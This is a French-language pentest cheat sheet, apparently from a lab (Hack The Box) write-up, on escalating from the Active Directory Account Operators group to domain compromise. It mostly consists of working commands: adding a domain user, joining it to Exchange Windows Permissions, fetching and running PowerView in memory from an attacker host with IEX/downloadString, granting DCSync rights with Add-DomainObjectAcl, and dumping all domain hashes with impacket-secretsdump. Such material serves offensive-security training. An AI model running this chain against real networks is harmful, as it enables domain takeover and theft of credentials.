Account Operator (whoami /priv) - Windows Privilege Escalation

Le groupe Account Operators dans Active Directory a des privilèges pour gérer les comptes utilisateurs et les groupes, à l'exception des comptes administratifs et des contrôleurs de domaine. Les membres de ce groupe peuvent créer, modifier et supprimer des comptes utilisateurs, mais n'ont pas accès à la gestion des autres objets sensibles du domaine.

Identification de l'appartenance à un groupe potentiellement problématique (Account Operator).

Utilisation de la capacité de création d'utilisateurs pour préparer une attaque DCSync.

net user jordanmacia password123$ /add /domain

Ajout de l'utilisateur à un groupe avec des permissions plus élevées (`Exchange Windows Permissions`).

net group "Exchange Windows Permissions" jordanmacia /add

Attaque WriteDACL:

$SecPassword = ConvertTo-SecureString 'password123$' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\jordanmacia', $SecPassword)

Préparation de l'attaque WriteDACL en utilisant PowerView.ps1 pour ajouter une fonctionnalité.

PowerSploit/Recon/PowerView.ps1 at dev · PowerShellMafia/PowerSploitGitHub

Transférer le fichier

python3 -m http.server 80

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11/PowerView.ps1')"

Vulnérabilité DCSync Attack:

Exécution de la commande Add-DomainObjectAcl pour obtenir les hashs.

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity jordanmacia -Rights DCSync

Utilisation d'Impacket pour extraire les hashs avec l'utilisateur jordanmacia.

impacket-secretsdump htb.local/[email protected]

Mis à jour il y a 1 an

hashtagIdentification de l'appartenance à un groupe potentiellement problématique (Account Operator).

hashtagUtilisation de la capacité de création d'utilisateurs pour préparer une attaque DCSync.

hashtagAjout de l'utilisateur à un groupe avec des permissions plus élevées (Exchange Windows Permissions).

hashtagAttaque WriteDACL:

hashtagTransférer le fichier

hashtagVulnérabilité DCSync Attack:

hashtagExécution de la commande Add-DomainObjectAcl pour obtenir les hashs.

hashtagUtilisation d'Impacket pour extraire les hashs avec l'utilisateur jordanmacia.

Identification de l'appartenance à un groupe potentiellement problématique (Account Operator).

Utilisation de la capacité de création d'utilisateurs pour préparer une attaque DCSync.

Ajout de l'utilisateur à un groupe avec des permissions plus élevées (`Exchange Windows Permissions`).

Attaque WriteDACL:

Transférer le fichier

Vulnérabilité DCSync Attack:

Exécution de la commande Add-DomainObjectAcl pour obtenir les hashs.

Utilisation d'Impacket pour extraire les hashs avec l'utilisateur jordanmacia.